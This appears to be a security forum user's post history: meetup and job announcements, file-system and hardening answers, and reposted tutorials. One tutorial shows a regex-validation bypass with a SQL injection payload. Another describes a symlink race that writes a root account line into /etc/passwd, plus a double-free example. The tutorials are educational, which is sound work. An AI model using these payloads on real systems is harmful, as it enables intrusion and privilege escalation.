Everything posted by Nytro

1. tl;dr: Saturday, 21 August, RST Meeting in Bucharest! Saturday, 28 August, RST Meeting in Cluj!

Hi, I have been thinking about a meetup like this for a long time, and since I expect some people to be out of town this Saturday, I figured that next Saturday, 21 August, would be ideal for going out for a beer. So, who wants to come out for a beer on Saturday, 21 August? I would prefer "active" people to come, in the sense that interested people with at least 30 posts will receive the location by private message (I do not know where yet, but we will find something, depending on how many of us there will be). Please vote only if you actually plan to come. Tell your friends from the forum about the event, since there are plenty who are no longer active here (we will make them pay the bill at the end).

Worth mentioning:
- If needed, you can bring wives/girlfriends, they should just expect drinking, swearing, bad jokes and IT talk
- On 28 August we may hold an RST Meeting in Cluj
2. Have you considered that, in certain situations, the way hackers exploit vulnerabilities over the network can be predictable? Anyone with access to the encrypted traffic can reverse the logic behind the exploit and thus obtain the same data as the exploit does. Various automated tools were analyzed, and we found that these tools operate in an unsafe way. Various exploit databases were analyzed as well, and we learned that some of the exploits in them are written in an insecure (predictable) way. This presentation will showcase the results of the research, including examples of exploits that, once executed, can be harmful: the data obtained after exploitation can be accessible to other entities without any need to decrypt the traffic. The SSL/TLS specs will not change; there is a clear reason for that, and in this presentation I will argue it. What will certainly change, however, is the way hackers write some of their exploits.
3. Hi, we are looking for a new colleague. We need someone who knows web security very well (a true senior), but who also has experience with architecture security reviews, Kubernetes / containers and some cloud. Communication and interaction with people are also relevant. In principle we want someone from Bucharest; I do not know whether Cluj is also a possibility, but I can ask.

Official job description:

Your mission: You will develop and apply formal security-centric assessments against existing and in-development UiPath products. You might also participate in other activities such as architecture security reviews, training for development teams, or management of our bug bounty program. A successful Senior Penetration Tester at UiPath is a self-starter with strong problem-solving skills. The ability to maneuver in a fast-paced environment is critical, as is handling ambiguity coupled with a deep grasp of various security threats. As a true owner of security at UiPath, great writing skills are needed, coupled with the ability to interact with stakeholders across multiple departments and teams. The Senior Penetration Tester acts as a mentor for technical peers and can transpose testing strategies and results into high-level, non-technical language.

This Is What You'll Do At UiPath:
- Penetration testing on products
- Security testing of desktop applications (Windows)
- Source code review (multiple programming languages)
- Cloud security reviews (Azure)
- Product architecture security reviews
- Recommendation of threat mitigations
- Security training and outreach to internal development teams
- Security guidance documentation
- Security tool development
- Security metrics delivery and improvements
- Assistance with recruiting activities

This Is What You'll Bring To Our Team:
- BS in Computer Science or related field, or equivalent work experience
- Minimum of 7 years of experience with penetration testing at the application and infrastructure layer
- Minimum of 5 years of experience working with developers, with personal coding/scripting skills
- Good understanding of security tools and techniques
- Good knowledge of attacking services hosted in the cloud (Azure, AWS, GCP)
- Good knowledge of threat modeling
- Good knowledge of operating system, network, and database security
- Advanced knowledge and understanding of web application security
- Experience writing PoCs for discovered vulnerabilities
- Experience with Kubernetes and containers
- Experience using various penetration testing tools (i.e. BurpSuite, Metasploit, etc.)
- Experience using debuggers and disassemblers for reverse engineering (IDA)
- Experience with Red Team exercises
- Experience with multiple programming languages

To apply: https://www.linkedin.com/jobs/view/2664874344/

If you want, you can send me a PM with your CV. Also PM me if you want to know more. PS: The requirements are very strict; we want someone who can help us with the projects from day one.
4. Yes, boot from a Linux and use the "dd" command. But it is simpler to read about the file structures involved.

Say you have many 1 GB files on the disk, and say that, raw, they sit exactly one after another. Then you delete half of each one. That means you have 0.5 GB chunks of file followed by 0.5 GB gaps of empty space. But what if you then want to store a 1 GB file? It will be split in two, across two such free chunks. When you access the file, half is read from the first location and half from the second. That is not much, but if a file ends up in 5,000 locations, the read time grows. I have no idea what optimizations are done, but it is more practical to defragment regularly than to have every operation take a long time.

Probably, in the metadata I was talking about, file size is stored as a 4-byte (32-bit) number, hence the ~4 GB limit. Other things may be involved as well, such as the way reads and writes are performed.

It does not know; you tell it how much by creating partitions.

Yes, that is possible. In Windows, right-click a file, choose Properties, and you will see "Size" (the size of the file itself) and "Size on disk" (how much it actually occupies; sizes are aligned to blocks of, for example, 4 KB). And that is without counting the metadata.

As far as I know, the need for defragmentation comes from classic HDDs, which have a platter spinning at, say, 7,200 RPM, read by "something". A file stored in different locations requires that head (laser or whatever it is) to physically move around, which takes time, so reads and writes become visibly slower. With an SSD you do not have this problem: there is no spinning disk and it is irrelevant where you write (although its microcontroller does avoid writing the same cells too often, that is not relevant to the file system). I hope I have not said anything stupid.
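A quick illustration of the "Size" vs. "Size on disk" difference mentioned above; a minimal Python sketch, assuming a 4 KB allocation unit and a hypothetical file path:

    import math
    import os

    CLUSTER = 4096  # assumed allocation unit (4 KB blocks)

    def size_on_disk(size_bytes, cluster=CLUSTER):
        # Round the logical size up to whole clusters, like "Size on disk"
        return math.ceil(size_bytes / cluster) * cluster

    logical = os.path.getsize("example.txt")  # hypothetical file
    print("Size:        ", logical, "bytes")
    print("Size on disk:", size_on_disk(logical), "bytes")

A 1-byte file therefore still occupies a full 4,096-byte cluster on disk, which is exactly the gap Windows reports between the two numbers.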
5. The file system is a kind of protocol that specifies how files are stored. Suppose you have a file "manele.txt": besides the contents of this file, other information must be kept as well, such as which user created it, when it was created, when it was last modified, what size it has, and so on.

Think of a hard disk / USB stick / CD / DVD as an empty storage space. If you just put raw data on it, it would make no sense; you need a structure of directories containing files, and everything has to carry the metadata above, so that when the operating system reads the raw disk it understands what is on it. File systems often have dedicated metadata areas, which contain no file data, such as the Master File Table. A trivial example would be a table in the first X MB of the disk of the form:

    File ID | Parent folder ID | Size | Owner | Last modification date | Data location on disk (offset)

The file system reads this table and understands which files are there. It uses the offset to know exactly where on the disk the file's contents are located, and it also has the other information about the file. The example is trivial; in practice much more information is needed, but this is the basic principle.

Every file system has advantages and disadvantages. Some may be fast, but that is all. Some may cap files at 4 GB. Some may be optimized for various things. Some need no defragmentation but are slower. Some are too complicated, etc. There are many things that can be taken into account, but for an ordinary user none of them really matter: the operating system (or the utilities implementing these file systems) takes care of everything that is needed, and everything is transparent to the user (well, almost everything; see FAT32 with its maximum file size of 4 GB).
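To make the toy metadata table above concrete, here is a minimal Python sketch (all names and values are invented for illustration):

    from dataclasses import dataclass

    @dataclass
    class FileEntry:
        file_id: int
        parent_id: int   # ID of the parent directory entry
        size: int        # logical size in bytes
        owner: str
        mtime: str       # last modification date
        offset: int      # where the contents begin on the raw disk

    # A tiny "metadata area", like a miniature Master File Table
    table = [
        FileEntry(1, 0, 4096, "nytro", "2021-08-01", 1048576),
        FileEntry(2, 0, 13, "nytro", "2021-08-02", 1052672),
    ]

    def read_file(disk, entry):
        # The offset and size from the metadata locate the actual contents
        return disk[entry.offset:entry.offset + entry.size]

A real driver does the same job at its core: parse the metadata area, then use the offsets to find the data blocks.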
6. There is not much you can do if the program's functionality does not allow activating the license. You can try setting the clock back a few years, but the chances of that working are slim (you set it forward again afterwards). Would a newer version of the program not do the job? Maybe you can talk to the vendor and get a new one.
7. If you want to run some crypto bot, I do not think you need to worry that the NSA has planted a backdoor there; nobody will care about you unless you are a globally important person (e.g. the director of a nuclear plant in Iran). Securing it is fairly simple:

1. Update as often as possible
2. Do not install every piece of junk
3. Remove the things you do not need, such as services you do not use
4. Leave only SSH, with key-based authentication, and you are done
5. You can do a lot of extra hardening, but you do not really need to

If you want, you can audit a Linux distribution and make sure it has no backdoor at all; it will just take a few thousand years:

1. Take all the source code and compile it
2. Do a reproducible build if possible; if not, diff what is on your distribution against what you compiled (see the sketch below)
3. Review all the differences (there will be some) caused by patches, modifications or configuration
4. Review all the source code, from the kernel to every installed program, and check that nothing has a backdoor
5. Bonus: hunt for vulnerabilities while you are at it

Now, more seriously, there is not much you can do alone, as one person. If a few thousand people got together, something like this could be done, but it would still take months or even years (with no updates happening in the meantime). As for that distribution, I have not heard of it; why did you choose it? Why not something "classic": debian, centos, ubuntu, kali etc.?
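A minimal sketch of the diffing step above, comparing per-file hashes of two trees; the ./installed and ./rebuilt paths are hypothetical placeholders:

    import hashlib
    from pathlib import Path

    def tree_hashes(root):
        # Map each file's relative path to its SHA-256 digest
        out = {}
        for p in Path(root).rglob("*"):
            if p.is_file():
                out[str(p.relative_to(root))] = hashlib.sha256(p.read_bytes()).hexdigest()
        return out

    installed = tree_hashes("./installed")  # binaries shipped by the distro
    rebuilt = tree_hashes("./rebuilt")      # the same packages compiled from source

    for rel in sorted(installed.keys() & rebuilt.keys()):
        if installed[rel] != rebuilt[rel]:
            print("DIFFERS:", rel)  # candidate for manual review

Without truly reproducible builds, expect plenty of benign mismatches (timestamps, build paths), which is exactly why step 3 above exists.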
8. Registry Explorer

Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include:
- Show real Registry (not just the standard one)
- Sort list view by any column
- Key icons for hives, inaccessible keys, and links
- Key details: last write time and number of keys/values
- Displays MUI and REG_EXPAND_SZ expanded values
- Full search (Find All / Ctrl+Shift+F)
- Enhanced hex editor for binary values
- Undo/redo
- Copy/paste of keys/values
- Optionally replace RegEdit
- more to come!

Build instructions: build the solution file with Visual Studio 2022 preview. Can be built with Visual Studio 2019 as well (change toolset to v142).

Sursa: https://github.com/zodiacon/RegExp
9. A Python Regular Expression Bypass Technique

One of the most common ways to check a user's input is to test it against a regular expression. The Python module re provides easy and very powerful functions to check if a particular string matches a given regular expression (or if a given regular expression matches a particular string, which comes down to the same thing). Sometimes, functions included in Python's re module are either misused or not very well understood by developers, and when you see this it can be possible to bypass weak input validation functions.

TL;DR: using the Python re.match() function to validate user input can lead to a bypass, because it will only match at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line will be ignored by the function. This means that a weak validation function that prevents the use of special characters in a value (for example id=123) could be bypassed with something like id=123\n'+OR+1=1--.

In this article I'll show you an example of bad usage of the re.match() function.

[From search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example:

    >>> re.match("c", "abcdef")    # No match
    >>> re.search("c", "abcdef")   # Match
    <re.Match object; span=(2, 3), match='c'>

Regular expressions beginning with '^' can be used with search() to restrict the match to the beginning of the string:

    >>> re.match("c", "abcdef")    # No match
    >>> re.search("^c", "abcdef")  # No match
    >>> re.search("^a", "abcdef")  # Match
    <re.Match object; span=(0, 1), match='a'>

As you can see, the first re.match didn't match because of its implicit anchor. Anchors do not match any character at all; instead, they match a position before, after, or between characters. They can be used to "anchor" the regex match at a certain position (https://www.regular-expressions.info/anchors.html).

Input Validation using re.match()

Let's say that I've got a Python Flask web application that is vulnerable to SQL injection. If I send an HTTP request for /news with an article id number in the id argument and a category name in the category argument, it returns the content of that article. For example:

    from flask import Flask
    from flask import request
    import re

    app = Flask(__name__)

    def is_valid_input(input):
        m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
        if m is not None:
            return False
        return True

    @app.route('/news', methods=['GET', 'POST'])
    def news():
        if request.method == 'POST':
            if "id" in request.form:
                if "category" in request.form:
                    if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]):
                        return f"OK: {request.form['category']}/{request.form['id']}"
                    else:
                        return f"Invalid value: {request.form['category']}/{request.form['id']}", 403
                else:
                    return "No category parameter sent."
            else:
                return "No id parameter sent."

By sending a request with id=123 and category=financial, the application replies with a "200 OK" status code and "OK: financial/123" as the response body.
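A quick way to reproduce that request (a sketch, assuming the app above is running locally on port 5000 via flask run, and that the third-party requests package is installed):

    import requests

    resp = requests.post(
        "http://localhost:5000/news",
        data={"id": "123", "category": "financial"},
    )
    print(resp.status_code, resp.text)  # expected: 200 OK: financial/123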
As I said, the id argument is vulnerable to SQL injection, so the developer has fixed it by creating a function that validates the user's input on both arguments (id and category) and prevents sending certain characters, like single and double quotes, or strings like "select" or "union". As shown above, this webapp checks the user's input with the is_valid_input function:

    def is_valid_input(input):
        m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
        if m is not None:
            return False
        return True

The code above means: "if the value of any input contains a double quote, a single quote, a semicolon, or an equals character, or any of the strings "select", "union", "from", "where", then discard it".

Let's try it: when injecting SQL syntax into the value of the id argument, the webapp returns a 403 Forbidden status with "Invalid value" as the response body, thanks to the validation function matching invalid characters in the payload, such as the single quote and the equals sign.

Input Validation Bypass

From the re module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())."

So, to bypass this kind of input validation, we just need to convert the SQL injection payload from a single line to multiline by adding a \n between the numeric value and the SQL syntax. If the question is "can SQL have a newline inside a SELECT?", the answer is yes, it can; the hypothetical query simply ends up with its WHERE clause split across two lines. Let's do it on the vulnerable webapp: I just put a \n (not CRLF, \r\n) after the id value and then started my SQL injection. The validation function only validates the first line, so I bypassed it. Using curl:

    curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news'
    OK: test/123

Run it in your Lab

First, save the vulnerable Flask webapp source code shown above as app.py, then start the Flask webserver with:

    flask run

Remediation

The first option is to do positive validation instead of negative validation: don't create a sort of deny-list of "not allowed words" or "not allowed characters", but check for the expected value format. For example, id=123 can be validated by ^[0-9]+$. The second option is to use re.search() instead of re.match(), which checks the whole value and not just the first line. Third option: don't create your own input validation function, but try to find a widely used and maintained library that does it for you. A sketch of the first option follows below.

Follow: if you liked this post, follow me on twitter to keep in touch! https://twitter.com/AndreaTheMiddle

Sursa: https://www.secjuice.com/python-re-match-bypass-technique/
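A minimal sketch of the positive-validation remediation suggested above. Note that re.fullmatch is used rather than re.match with ^...$, because in Python $ also matches just before a trailing newline:

    import re

    def is_valid_id(value):
        # The entire value must be digits; "123\n' OR 1=1--" is rejected
        return re.fullmatch(r"[0-9]+", value) is not None

    assert is_valid_id("123")
    assert not is_valid_id("123\n' OR 1=1--")
    assert not is_valid_id("123\n")  # trailing newline is rejected too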
10. Winning the race: Signals, symlinks, and TOC/TOU

23rd Jun 2021, by uid0

Introduction:

So, before we dive right into things, a few bits of advice: some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and an understanding of how multi-threading and signal handlers work would all be beneficial for readers wanting to follow the concepts I'm going to cover here. If you can't code, don't worry, as I'm sure you'll still be able to grasp the concepts; that being said, prior programming knowledge will give you a deeper understanding of how this actually works. It won't kill you to read up on the subjects I just mentioned, and by doing so you will understand this tutorial a lot more easily. Ideally, if you understand C/C++ and assembly language, you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help.

Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities. And when vulnerabilities do arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (no kidding!). Generally, within multi-threading, race conditions aren't an issue in terms of exploitability but rather an issue of the intended program flow not going as planned (note "generally"; there can be exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional (I'm talking in terms of paradigm here, although I guess that use of terminology is interchangeable, since if your code suffers from race condition flaws then it lacks functionality in the non-paradigm sense too), then race conditions will not occur.

So, what exactly are race conditions? Let's take a moment to sit back and enter the land of imagination. For the sake of this post, let's pretend you're not a fat nerd sitting in your Mom's basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Let's imagine, just for one moment, that you're someone else. You're not just any old someone, no. You're someone who does something important. You're a world-class athlete. You spent the last 4 years training non-stop for the 100m sprint, and you are certain you are going to win the Gold Medal this year. The time finally comes: you are ready to race. During the sprint, you're neck-and-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow motion to see who crossed the line first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you're both given Gold, decreasing the subjective value of the medal?
What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions!

This is Part One of a three-part series diving into the subject of race conditions; there's absolutely no way I can cover this whole subject in three blog posts. Try three books, maybe! Race conditions are a colossally huge subject with a wide variety of security implications, ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it, on the other hand, is a bit more hit and miss, but I'll get into that later).

Race conditions stem from novice developers making the assumption that their code will execute in a linear fashion, or from developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time, this can cause changes within the code flow of the program that end with undesirable results (or desirable, depending on whether you're asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren't necessarily always a security risk; in some cases they just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, mainly within web applications or within vulnerable C programs.

The basic premise of a race condition bug is that two threads "race" against each other, allowing the winner of said race to manipulate the control flow of the vulnerable application. I'll touch lightly upon race conditions being present in multi-threaded applications and give some brief examples, but this post will mainly focus on races as a result of signal handling, faulty access checks and symlink tricks. In addition, I'll give some examples of how this class of bugs can be abused within web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I'll give a quick overview of the basics, which hopefully you can build upon with your own research.

To give you a simpler analogy of what a race condition is, imagine you have online banking with a banking platform. Let's assume you open two separate browser tabs at once, both with the payment page loaded, and you set up both browser tabs so that you're ready to make a payment to another bank account. If you were to then click the button to make the payment in both tabs at identical times, the platform could register that only one payment had been made, when in reality the payment had been made twice but the money for only one of the payments has been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although it is highly unlikely to ever happen in a real-world scenario.
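The banking analogy above maps directly onto a classic check-then-act race. A minimal Python sketch (the two "browser tabs" are threads, and the non-atomic balance check is the bug):

    import threading
    import time

    balance = 100  # shared state: the account balance

    def make_payment(amount):
        global balance
        if balance >= amount:   # Time of Check
            time.sleep(0.1)     # processing delay widens the race window
            balance -= amount   # Time of Use

    # Two "tabs" submit the same 100-unit payment at once
    t1 = threading.Thread(target=make_payment, args=(100,))
    t2 = threading.Thread(target=make_payment, args=(100,))
    t1.start(); t2.start(); t1.join(); t2.join()

    print(balance)  # typically -100: both checks passed before either deduction

The fix, as with most races, is to make the check and the use one atomic step, e.g. by holding a threading.Lock across both.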
I'm going to demonstrate some code snippets to explain this, in order to show different kinds of races that are possible, and give examples in various languages; I'll start with pseudo-code. [The C-inspired pseudo-code snippet was included as an image in the original post.] The reason I gave the first example in C is that race conditions tend to be very common within vulnerable C applications. Specifically, you should be looking for the signal.h header, as this is generally a good indicator of a potential race condition bug being present (within issues regarding signal handling, at least). Another good indicator is access checks being present for files, as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages and explain context-specific race condition bugs associated with those languages.

While the code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Let's assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, the specified function is executed. If timed correctly, an attacker could make it so that something is permitted at the time of check, but no longer permitted at the time of use (this would be a TOC/TOU race, meaning "Time of Check / Time of Use"). So, for example, we can assume that the following test is being run:

    if (something_is_permitted) // check if permitted

The conditions for the if statement are met and the code flow continues in the intended order, but by the time the function gets called, the thing that the check approved is no longer permitted, and yet the following code executes anyway:

    doThis();

This results in unintended program flow, and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I'll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications.

When most people think of race conditions, they imagine something very fast-paced, expecting that the timing required to execute a TOC/TOU race needs to be extremely precise. While this is often the case, it is not always so. Consider the following example of a "slow-paced" race condition bug:

- There exists a social-networking application where users have the ability to edit their profile
- A user clicks the "edit profile" button and it opens up the webpage allowing them to make edits
- The user then goes AFK (Away From Keyboard)
- The administrator finds an unrelated vulnerability in the profile-editing section of the website and, as a result, locks down the edit functionality so that users can no longer edit their profiles
- The user returns, and still has the profile-editing page open in a browser tab
- Despite new users not being able to access the "edit profile" page, this user already has the page opened and can continue to make edits despite the restriction put in place by the administrator

Race conditions can also take place as a result of latency within networks. Take IRC for example, and let's assume that there is a hub and two linked nodes.
Bob wants to register the channel #hax, yet Alice also wants to register this same channel. Consider the following:

- Bob connects to the IRC from node #1
- Alice connects to the IRC from node #2
- Bob runs /join #hax
- Alice runs /join #hax
- Both of these commands are run from separate nodes at around the same time
- Bob becomes an operator of #hax
- Alice becomes an operator of #hax

The reason for this is that, due to network latency, node #1 does not have time to send a signal to node #2 alerting it that the services daemon has already assigned operator status to another user on the same network.

(PROTIP: When testing local desktop applications for race conditions - for example a compiled binary - use something like GDB or OllyDbg to set a breakpoint between TOC and TOU within the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk, or lack thereof. This is for confirmation of the bug only, not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions, considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it.)

Symlinks and Flawed access checks:

Using symlinks to trigger race conditions is a relatively common method, and here I will give a working example. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++; this would allow an attacker to escalate privileges in order to get root on a server (assuming the server had a program that was vulnerable in this manner). It should be noted that while writing to /etc/passwd in the manner I'm about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) permissions on root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is running with setuid access rights.

The intended purpose of the program is to check whether you have permission to write to a specific directory (via an access() check); if you have permission, it writes your input to the file of choice. If you don't have permission, the access() check is intended to fail, indicating that you're attempting to write to a directory or file which you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc requires additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp, where it has permission, when in fact it is writing to /etc, where it lacks permission.

In modern Linux distributions (and in modern countermeasures implemented in languages such as C), there are ways of attempting to mitigate such an attack. For example, POSIX C programs can use the mkstemp() function, as opposed to fwrite() or fopen(), in order to create temporary files safely, and mktemp(1) likewise allows for the creation of temporary files on *nix-based systems. Another mitigation on *nix-based systems is the O_NOFOLLOW flag for open() calls, whose purpose is to prevent files from being opened via a symbolic link.
Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one which will be used): [the listing, included as an image in the original post, shows an example setuid program vulnerable to a typical TOC/TOU symlink race condition by means of an insufficient access check]

I will be compiling and running this from my (non-root) user account. First, I will demonstrate this using a debugger (GDB, although others such as OllyDbg will suffice too), because it allows you to pause the execution of the program, making it easier for the race condition to take place; in a real exploitation scenario you would need to trigger the race condition naturally, which I will demonstrate next. First, disassemble the code using your debugger of choice, then set a breakpoint at fopen() so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally:

    break *0x80485ca

Then replace the written file with a symbolic link. Now that you've paused the execution of the program flow through the use of a breakpoint, resuming the program flow (after the symlink has been made) causes the access check to be passed, meaning the program continues to run as intended and writes the input to a file that would normally not be writeable by this user.

Of course, using GDB or another debugger isn't possible in real-world scenarios, so it is necessary to implement something that allows the race condition to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing the two operations at the same time until the race condition is met. The following example shows how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, the access check is passed and a new entry is written to /etc/passwd.

Script #1: runs the vulnerable program repeatedly until the condition is met; that's why it re-executes itself within a while loop.
Script #2: repeatedly attempts to make a symbolic link to /etc/passwd.
(Both scripts were included as screenshots in the original post; a reconstruction is sketched below.)

After a while of both of these scripts running at the same time, the timing should eventually work out so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and data to be written to a previously restricted file (/etc/passwd in this case). If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs:

    raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh

From here, they can simply use 'su' to authenticate as a root user with the new 'raceme' account they have created by adding an entry to /etc/passwd. g0t r00t!!
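As noted, the original attack scripts were screenshots; here is a minimal Python reconstruction of the same idea (a sketch only: the ./vuln binary, its argument order, and the /tmp/output path are assumptions based on the description above):

    import os
    import subprocess
    from multiprocessing import Process

    TARGET = "/tmp/output"  # the path the setuid program access()-checks, then writes

    def hammer_program():
        # Script #1: run the setuid binary over and over until the race is won
        while True:
            subprocess.run(["./vuln", TARGET,
                            "raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh"])

    def flip_symlink():
        # Script #2: keep swapping the target between a real file and a symlink
        while True:
            try:
                open(TARGET, "w").close()          # real, user-writable: access() passes
                os.remove(TARGET)
                os.symlink("/etc/passwd", TARGET)  # if fopen() runs now, the write is redirected
                os.remove(TARGET)
            except OSError:
                pass  # lost an interleaving; just try again

    if __name__ == "__main__":
        Process(target=hammer_program).start()
        Process(target=flip_symlink).start()

Each iteration is another chance for access() to see the real file while fopen() lands on the symlink.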
Race Conditions within Signal Handling:

If you do not understand the concept of signal handlers within programming, then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws. The most common occurrence of race conditions within signal handling is when the same function is installed as the signal handler for multiple different signals, and those different signals are delivered to that same signal-handling function within a short time-frame of each other (hence the race condition).

"Non-reentrant" signal handlers are the primary culprit that makes signal-based races pose an issue. If you're unfamiliar with the concept of non-reentrance within signal handling, then I really do suggest reading into the topic in depth, but if you're like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology used to describe it is somewhat self-explanatory, in all honesty): if a function has been installed with signal-handling operations in mind, and said function either maintains an internal state or calls another function that maintains an internal state, then it's a non-reentrant function, which means there is a higher probability of a race condition being possible.

For an example demonstrating the exploitability of race condition bugs associated with signal handlers, I will be using the free() function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application security flaw referred to as a "double free". The code example further below shows how an attacker could craft a specifically timed payload. If you're not spotting the common trend here: race conditions are all about timing. Generally, attackers will have their payloads running concurrently in a for/while loop, or they'll create a ghetto-style "loop" of sorts by having payload1.sh repeatedly execute payload2.sh, which in turn will repeatedly execute payload1.sh, and so on. The reason for this is that in many contexts, for a race condition to be successful, the requests need to be made concurrently, sometimes down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right, it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop the attacker gets another chance of getting the timing right. Pair this with methods of slowing down the execution of certain processes, and the attacker has now increased their window (the "window" in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). With a TOC/TOU race, the "attack window" is the time frame between the check taking place ("TOC", Time of Check) and the action occurring ("TOU", Time of Use): for a very short period the check says the action is permitted, right up until the iteration wherein the next check occurs and the action is no longer permitted, meaning the window has closed. In short, an attacker's options are:

- maximising the window in which the attack can be carried out, by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter below)
- making as many concurrent attempts at triggering the race as possible within the time-frame dictated by the length of the attack window, using multiple threads where possible
- testing manually with a debugger, by setting a breakpoint between TOC and TOU
- having lots of processing power available to make as many concurrent requests as possible during the attack window (while using the methods described here to slow down other elements of process execution at the same time)

Below you can find an example of a race condition present via signal handling, with the triggering of a double free as a proof of concept. This code example uses the same signal handler function for multiple signals; the handler is non-reentrant and makes use of shared state. The function in question is free(), and in this code example an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption taking place as a direct result of the race condition itself.

If you have experience with C/C++ and dynamic memory allocation, then you're probably aware of the issues posed by a double free triggered as a result of calling free() twice with the same argument. For those who are not aware: this is known as a "double free" bug, and it results in the program's memory-management structures becoming corrupted, which can cause a multitude of problems ranging from segfaults and crashes to arbitrary code execution, as a result of the attacker being able to control the data written into the memory region that has been freed twice and subsequently reallocated, resulting in a buffer overflow taking place. And while the RCE is triggered by the overflow, which in turn is triggered by the double free, the double free itself is triggered as a result of a race condition occurring due to two separate signals being delivered to the same handler around free(), which, without getting overly technical, essentially makes malloc() throw a hissy-fit and poop its pants. The following code demonstrates the issue (the original listing was deliberately abbreviated; it is lightly fleshed out here so that it compiles):

    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <unistd.h>

    char *globvar; /* shared state used by the (non-reentrant) handler */

    void vuln(int pwn) { /* some lame program */
        free(globvar);   /* double free if the handler runs twice */
    }

    int main(int argc, char *argv[]) {
        globvar = malloc(128);
        signal(SIGHUP, vuln);  /* same handler installed for two signals... */
        signal(SIGTERM, vuln); /* ...overflowz and code exec, all due to a pesky race condition */
        pause();               /* wait for the signals to arrive */
        return 0;
    }

There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of things that could trigger a race condition via signal handling (from Mitre's CWE database):

- Shared state (e.g. global data or static variables) that is accessible to both a signal handler and "regular" code
- Shared state between a signal handler and other signal handlers
- Use of non-reentrant functionality within a signal handler, which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.
- Association of the same signal handler function with multiple signals, which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.
- Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality
- While not technically a race condition: some signal handlers are designed to be called at most once, and being called more than once can introduce security problems even when there are no concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses.

Out of everything just listed, the most common cases are either one signal handler being used for multiple signals, or two or more signals arriving in short enough succession of each other to fit the attack window of a TOC/TOU race condition.

Methods of slowing down process execution:

